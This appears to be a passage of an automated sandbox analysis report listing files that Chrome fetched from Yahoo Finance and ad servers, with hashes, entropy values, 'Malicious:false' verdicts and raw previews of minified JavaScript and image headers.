                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){var n="tsdtocl",e="!-#@",t="ul",i="https:",o=atob("aHR0cHM6Ly90c2R0b2NsLmNvbQ=="),r={},a=i,d=-1,c,u;try{var s=function n(e){r[e.id]&&(r[e.id](e),delete r[e.id])},w=function e(t){var i;try{i=JSON.parse(t.data)}catch(n){}i&&i.namespace===n&&s(i)},f=function e(t,i,o,a){if(c){r[++d]=a;var u={namespace:n,id:d,action:t,key:i,value:o};return c&&c.contentWindow&&c.contentWindow.postMessage(JSON.stringify(u),"*"),u}},l=function n(e){for(var t="".concat(e,"="),i=document.cookie.split(";"),o=0;o<i.length;o++){for(var r=i[o];" "===r.charAt(0);)r=r.substring(1);if(0===r.indexOf(t))return r.substring(t.length,r.length)}return""},g=function n(e,t,i){return f("append",e,t,i)},p=function n(t){if(t&&"string"==typeof t&&-1!==t.indexOf(e)){var i=new Image;return i.src="".concat(a,"//trc.taboola.com/sg/taboola-ifs/1/um/?uils=").concat(encodeURIComponent(t)),i}},m=function n(e){if(e&&e.success){if(e.wasAppended&&e.value)return p(e.value)}else window.__trcDebug&&window.__trcDebug("ifsDebug=".conc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12587)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12681
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.210319120497626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:ybCNRfmZ++jS5Bn6sJ6e3TyKsGm+Ckl4RV8Bo+iDQrQMrvj4riFXEaiZDQ/2n/Jp:6C+jS5BBJ6eDyyCM4D4yDQRrvj4r3VZf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AE29A18FBC79EF7E4332EB63CB00686D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C7F777BE47B2202A25617231BF9DC59512D84778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:37DE00E89DF6A299F62130D333F26ED8DC68380802D2C18CFF1BBECB10F0D881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1E972333964CBDAA3056294ED1E4F11CFCA691D03CE2A3508F483E421244383698A39486A1425D30F85198DF415A711F4F73DDCB6A68EF20B1E60155FDD3E615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-1a02c5ac.4fd10af6e454d961cbcb.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-1a02c5ac.4fd10af6e454d961cbcb.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[1037],{8762:(e,a,r)=>{var t=r(4603);var i,s;i="undefined"!=typeof window?window:r.g,(s=void 0!==t.mE?t.mE:i.CIQ).ChartEngine.prototype.addSeries=function(e,a,r){var t=this.runPrepend("addSeries",arguments);if(t)return t;var i=e||null,n=e;e||(e=s.uniqueID()),a&&!0===a.panel&&(a.panel=e);var o={parameters:a?s.clone(a):{},yValueCache:[],display:i,id:e,loading:!a||!1!==a.loadData};o.parameters.yAxis=a&&a.yAxis,(a=o.parameters).symbol&&(n=a.symbol),a.isComparison&&(a.shareYAxis=!0),!a.yAxis||a.yAxis instanceof s.ChartEngine.YAxis||(a.yAxis=new s.ChartEngine.YAxis(a.yAxis)),s.ensureDefaults(a,{chartName:this.chart.name,symbolObject:{symbol:n},panel:this.chart.panel.name,fillGaps:!1,action:"add-series"}),"display"in a&&(o.display=a.display);var l=this.charts[a.chartName],p=a.symbolObject;n=a.symbol=p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1376)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1377
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4519149065185735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:mqhePnseGXU5HcDqd0pSzp5NHFCaxEzvT2ZBJMz0zLoT616C9aNa:mqhunsw5MpQTc/2GzG8TkVV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:80B14245F4DA1C98938F575EF7384080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2E2FD062F05E847B7476B708F04F964100F19F97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F88CCA436E9CD5519975D0B3D039B62D6B3DBEF1AE78D28DE5264ADF8DA7C9CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:116AC0B784FB30812EFC442BB7692D1AD08BAF1593F11E3291EE3AD78064C906032EE023860C65A6B94A2B9BBEFF27046F55C0B44D3C1AE9BC4238379E088FE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as L,c as z}from"./commonUtil.BWwawKjd.js";import{n as A,g as Q}from"./utils.CNaWwYSx.js";import{l as T}from"./initializePage.LkEoQoQZ.js";import{l as C}from"./loadQuote.BOFhtUlf.js";import{l as v}from"./logUtil.CCV3qKPL.js";const n={count:250,imageTags:["170x128"],thumbnailSizes:["170x128"],spaceId:void 0,adsSectionId:void 0};async function _(t,{fetchQuoteData:f=!1,listName:i="",isPagination:p=!1,imageSize:u={},...o}={listName:""}){var d;const[r,[b,e,P]]=await Promise.all([L(t),z(["config","ncpStreams","crumb"],t)]),{ads:h={},i13n:k}=b.getPageConfig()??{},{adsSectionId:w}=h||{};n.adsSectionId=w;const{spaceid:c}=k||{};c&&(n.spaceId=c);const{imageTags:m=[]}=o;m.length&&(o.adsImageTags=m);const s=i,y={key:"ncp_fin",...n,adsEnabled:!P.isAdLite,listName:i,perfLabel:`loadQSPLeafNews:${i}`,...o};e.initializeStream(s);try{const a=await T(t,y),{stream:g,pagination:I}=((d=a==null?void 0:a.data)==null?void 0:d.tickerStream)||{},l=A(g,r.lang,{imageSize:u||["170x128"],thumbnailSizes:o.thu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5636), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.265735267819504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:RAnbGg2U2OUK1yZ4YHPEppcIzvxpJ3xIzpNxv+S6hmAPm6UO5OUK3YvE0m6i5xDc:eCgl104YHPEppc+vxpJ3xMpNZgdWGEiv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0CCB51BC1DD6980920DA39E008A599E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:929B21AC5A628A05E9F87A8E734954D90F1EE093
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B168BE397AC36DBCA02B07547DAD2A928427E765DF9B49A931F05DB057F3A83C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:665527069009017AB5B2ACAB0EE764052C84672451CCE9189961420E38239C3C63852D60366952BDFF92DECB3610BD8ABE6BDD44A5B8F89CF51CEF04445F2267
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var WORK_SERVER="https://edge-mcdn.secure.yahoo.com/ybar/exp.json",TIMEOUT=2e3,Cerebro=function(){function e(){this.uploadType="individual",this.expCount=0,this.pending={},this.complete=0}return e.runExperiment=function(){(new e)._fetchWork()},e.sendBeacon=function(){this.runExperiment()},e.prototype._extractResourceTiming=function(n){var t="",t="[";return["startTime","redirectStart","redirectEnd","fetchStart","domainLookupStart","domainLookupEnd","connectStart","secureConnectionStart","connectEnd","requestStart","responseStart","responseEnd"].forEach(function(e){t+=n[e]+","}),t=t.slice(0,-1)+"]"},e.prototype._extractHeader=function(n,e){if(0==e.length)return"{}";var t="{";return e.forEach(function(e){t+='"'+e+'":"'+n.getResponseHeader(e)+'",'}),t=t.slice(0,-1)+"}"},e.prototype._fetchWork=function(){var n=this,r=!1;new Promise(function(n,t){var o=setTimeout(function(){r=!0,t(new Error("Work Order Request Timed Out"))},TIMEOUT);fetch(WORK_SERVER).then(function(e){clearTimeout(o),r||n(e)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17522)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.383575706839626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:l9SWMoNepgrcIn7Q++/OaxBNdiUyMxnGJu5YWB6AVoLnhIxWEY1CCToxI2I6qF7k:fCoY6u6AVoL8ICV1I6q1HYE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:69135A246C8485C92D7CDB75346CE1DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D71AE918D4E9736999D7A7E4BD6382F10B632803
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3B631E8B0FA4691E3DE85F47675ED6C624C9B62EB2B5D1284BD58D1FF8D09433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FDEB59593D808EF409AC0B2A1C20ED134BFC344061AB68960FB2053F402EBD3B192DB3D107FA6C2390D696AA824B254D7B034A5552E4303BA6A09FEFDF033B3C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-ed551f3e.3f4fee857b5980cbe288.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[7953],{5316:(t,e,n)=>{var i=n(4603);var r,s,o;r="undefined"!=typeof window?window:n.g,s=void 0!==i.mE?i.mE:r.CIQ,o=void 0!==i.vn?i.vn:r.timezoneJS,s.timeZoneMap={"(UTC-05:00) Eastern Time (US and Canada)":"America/New_York","(UTC) Greenwich Mean Time, Reykjavik":"UTC","(UTC) Lisbon, London":"Europe/London","(UTC+09:00) Osaka, Sapporo, Tokyo":"Asia/Tokyo"},function(){var t=("undefined"!=typeof window?window:null)||(void 0!==n.g?n.g:{});o.VERSION="0.4.11";for(var e=t.$||t.jQuery||t.Zepto,i=t.fleegix,r=o.Days=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],a=o.Months=["January","February","March","April","May","June","July","August","September","October","November","December"],u={},h={},c={},l=0;l<a.length;l++)u[a[l].substr(0,3)]=l;for(l=0;l<r.length;l++)h[r[l].substr(0,3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3425)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3426
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.393523784110459
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:/465ejpKWdmxd95ersyPsWw9XK7DkKNtI:/4654xmxd95er7Pl7DNtI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DC83766246839D189E60E58BB9F97371
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:76430CACDC91E9C68A8227ABF76A527357B5D5F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B152412815ED6623E0EF20B5AC7BA1B5AACB669DC89EFE1D5827440DC41154C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A5B6CE57FBFC61DCBFB6164935089D1A0567025F9B3DA70EAA58FA2C1F1261C642D81D2B6B5631DFDE9F4C033A788D3C1A6F60FD3FB484AEDC138BF1A866F243
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/ViewMoreLink.Bd590k7x.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as j,p as h,k,i as d,c as T,A as q,b as C,j as F,u as w,g as z,a as N,t as I,h as O,m as R}from"./scheduler.Dsuh-FKt.js";import{S as W,i as v,g as B,a as m,e as D,t as c,c as V,b as E,m as p,d as A}from"./index.CvwOawEI.js";import{g as G,a as H}from"./spread.CgU5AtxT.js";import{A as L}from"./arrow_forward.8N8VOjY3.js";import{L as S}from"./Link.vSNQugO0.js";import{t as J}from"./commonUtil.BWwawKjd.js";function K(a){let l,t,i;const s=a[9].default,n=T(s,a,a[10],null),r=[{className:a[4]},{href:a[0]},{"aria-label":a[6]},{size:a[8][a[5]]},{i13nModel:a[1]},{title:a[6]},{variant:"subtle"},{icon:L},{"data-testid":a[2]},a[3]?{"data-sveltekit-reload":""}:{}];let u={$$slots:{default:[Q]},$$scope:{ctx:a}};for(let e=0;e<r.length;e+=1)u=q(u,r[e]);return t=new S({props:u}),{c(){n&&n.c(),l=C(),V(t.$$.fragment)},l(e){n&&n.l(e),l=F(e),E(t.$$.fragment,e)},m(e,o){n&&n.m(e,o),k(e,l,o),p(t,e,o),i=!0},p(e,o){n&&n.p&&(!i||o&1024)&&w(n,s,e,e[10],i?N(s,e[10],o,null):z(e[10]),null);const _=o&383?G(r,[o&1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8527)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.415964657645723
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:8xfdkRBGobhCyN3O1+8u+JWWA+U+N+x+0Y+T86Bph+H+n+b+YqcFq08uiPayViQl:ymBGCCyNy+8u+kWA+U+N+x+0Y+1+H+nb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6E470F4519A4BAD8860D9A796CCF4B2F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8E0CAD096062F90CCF6EE393EF522BAF65405A7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BA4488D54C32A8761EC76005427F8CDE1D8BCB56C19C4C66CFE9A98B8C6BD2FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E1383F5223926EB4F3AC96F6EEDCCCF735B02B4CF82004D6DAEB64126E7A671740EED685069F886CE2642DB9FC71E02D55DF91CC8E71FA053C9B9038070D0579
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-e6a21627.433a9f093dc6d5f71b82.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-e6a21627.433a9f093dc6d5f71b82.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[9365],{3504:(e,t,a)=>{a.r(t);var i=a(4603),r=(a(1772),void 0!==i.mE?i.mE:_exports.CIQ);r.Marker?r.Tooltip=r.Tooltip||function(e){if(!r.Marker)return void console.warn("CIQ.Tooltip addon requires CIQ.Marker module to be enabled.");this.cssRequired=!0;const{stx:t,ohl:a,change:i,volume:l,series:o,studies:s,signalStudies:n,interpolation:p,showOverBarOnly:h,showBarHighlight:c=!0,useDataZone:d,caption:u}=e,{container:m}=t.chart;let y=m.querySelector(".hu-tooltip");if(y||(y=document.createElement("table"),y.classList.add("hu-tooltip"),m.appendChild(y)),u){let e=y.querySelector("caption");e||(e=document.createElement("caption"),y.insertBefore(e,y.firstChild)),e.innerHTML=t.translateIf(u)}let f=m.querySelector(".hu-tooltip-highlight");function g(){const{headsUp:e,crosshair:a}=t.layout,i=e&&e.floating||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.943553143014523
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:AyMOZRQaUhyyPeV73Ww8r4ofSivR5UFoh+XIw31xEwZIaVyr1tkIk:cOZRehtep34r4o5vR5UFNl1xrZFyhed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3A37F3D24FE68E35C1F239537FABAC9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2EF6B79EA0C20CEE9899A0052AB54B1A19D6D1BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9D8AB0C55EA5657FB367CF598918A9461DE8DC7462710B17AC448E6CCF3A8984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6A4CF5351D400E92DB46FD5E58E474F058B428ABE46901B13D55FE8ABCC3869810943F4F669C5305AD34A894D2957D4E0F111F186B240B0C4B09836AB99FBF1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_144.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............F.....gAMA......a....EIDATx..]{xU..!.$@.I....<.AyT.@...O.B..."......Tf(3R;...1E..qt....X,....bA(...B..^!.!....N...}.=..s.s..[9..X{..Y{..=..iF...Yhr?.@...X.....-j..Y....sEFF.....e.rK...h_)x,.F. 0............=.....U..)I). ...zi...<.<...XP.#".....k......S...@.........I.......'.uJJ..4m.|Z.i.......8.-.......&[#..@.N..<....g.);..G.|1x!.t(D.y....p....?..,*......y........3......a+....r...iG.6<!......^......\+Q.l.i[...Y]B...)..s.O.....,Z.E...H.B%......C9......U..*.=.......6..@...(a.xt...d.o..O.D..)w...'.........>.....!u.~vwr.....=!.;`.S).^..P.C.F.%.bn....h!...<.u5u.C.{.:()f.B... .....dSI...u..uL]..5..1..."...<&rQU.04..i...v&.<.%..@.O.H.....E....A....xY....x.Cx..N...k.N5A...=...N39;P...B.K.o.."t..Rx. .<....siBQ|5.>X....>..r.9f3.....r....g..<W...JZ.\7.Te...z.t.@.e.W.5..<t...a.......X.. ..S..`.0{......(.(.)~.N4.. .........}..wQU... ..eF.U.0.n.Kf.....#. *............;.a......rU........*...........:.....-.jU=..'^...i(@..~..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):89792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.995541217551623
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:9upe+JuN/hTS5ZJF8Msfdc/V4Ko2ob8HJqQam74s/cPYxB5C+G+57A++t0He/:9UeN/BS5Zxs5Ko2o2J337ke5st0Hu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:26ECA1CFE3B9DB0F05ADF00E942F7E79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7D83EAEC87173253D0F45C6517D913185E1F13FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:24E6C43B0C435F5A54A142D0953CE0B313007E369187B8FECF6F1A3F05E360CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4C716A9080B3B345BF32EAD9F7D358EF4F338984BC6DCD22BFDCC901E2C50B8E47A029881DCAE7041D04750EFC67A9BD33859F3CA49780DC43B8FBCA060696F4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/sVHMxKrPePA197woLBKrVg--~B/Zmk9c3RyaW07aD0yNzI7cT05NTt3PTU2MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/f1738c10-7f1f-11ef-b7bf-d9a760ad838d.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF.^..WEBPVP8X.... .../.....ICCP0......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../....VP8 b\...4...*0...>...A!......a,m.F....x..cf.E.c.g..%..._......5.~c>..G....W.E.?............................?.~......+.;./.......{......;.[.............................c..............?............D.1.......|g.o......W....../....g.o...q...A.)........................................o.._................%.....'5...c...g.../..$.....w.....~.....................................7............./
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):50525
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.965966358437018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:p6tklW+v/SgU5TUkDmqKkJqjgQmhDfOFPtOW5K:xY+6UH9kIPUb2g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E9139033770BBF5B46DAF32DB416C2BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:008262D7B1EE40722950B1BB65ED810F11BED998
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:067611FBF2EBC92B9C1D6DFA0CC8AE0C8464A1C5769B51FCEA3797EC184E92C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0B1A4C293FBFEC6C321A47F9C67CB68D957E09B1807F10C7BF9BBF29ECE7578C82320DFFECFFEDB9573231EFE2F5896ADB124B708A6355C55AC3D94F5336F90D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C....................................................................C......................................................................................................................Q.........................!..1..AQa."q..2B....#Rb..$3Cr..S.....%4D..Uc..&7Ts.....................................<.........................!..1.A."Q.#2aq$B....3......%4CRbS............?........L.7...#..w6....li<......S.,.q.....V7-z....p..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.943553143014523
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:AyMOZRQaUhyyPeV73Ww8r4ofSivR5UFoh+XIw31xEwZIaVyr1tkIk:cOZRehtep34r4o5vR5UFNl1xrZFyhed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3A37F3D24FE68E35C1F239537FABAC9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2EF6B79EA0C20CEE9899A0052AB54B1A19D6D1BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9D8AB0C55EA5657FB367CF598918A9461DE8DC7462710B17AC448E6CCF3A8984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6A4CF5351D400E92DB46FD5E58E474F058B428ABE46901B13D55FE8ABCC3869810943F4F669C5305AD34A894D2957D4E0F111F186B240B0C4B09836AB99FBF1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............F.....gAMA......a....EIDATx..]{xU..!.$@.I....<.AyT.@...O.B..."......Tf(3R;...1E..qt....X,....bA(...B..^!.!....N...}.=..s.s..[9..X{..Y{..=..iF...Yhr?.@...X.....-j..Y....sEFF.....e.rK...h_)x,.F. 0............=.....U..)I). ...zi...<.<...XP.#".....k......S...@.........I.......'.uJJ..4m.|Z.i.......8.-.......&[#..@.N..<....g.);..G.|1x!.t(D.y....p....?..,*......y........3......a+....r...iG.6<!......^......\+Q.l.i[...Y]B...)..s.O.....,Z.E...H.B%......C9......U..*.=.......6..@...(a.xt...d.o..O.D..)w...'.........>.....!u.~vwr.....=!.;`.S).^..P.C.F.%.bn....h!...<.u5u.C.{.:()f.B... .....dSI...u..uL]..5..1..."...<&rQU.04..i...v&.<.%..@.O.H.....E....A....xY....x.Cx..N...k.N5A...=...N39;P...B.K.o.."t..Rx. .<....siBQ|5.>X....>..r.9f3.....r....g..<W...JZ.\7.Te...z.t.@.e.W.5..<t...a.......X.. ..S..`.0{......(.(.)~.N4.. .........}..wQU... ..eF.U.0.n.Kf.....#. *............;.a......rU........*...........:.....-.jU=..'^...i(@..~..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://us-u.openx.net/w/1.0/sd?id=560843120&val=_czIXS3XxhMDcB16wznZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
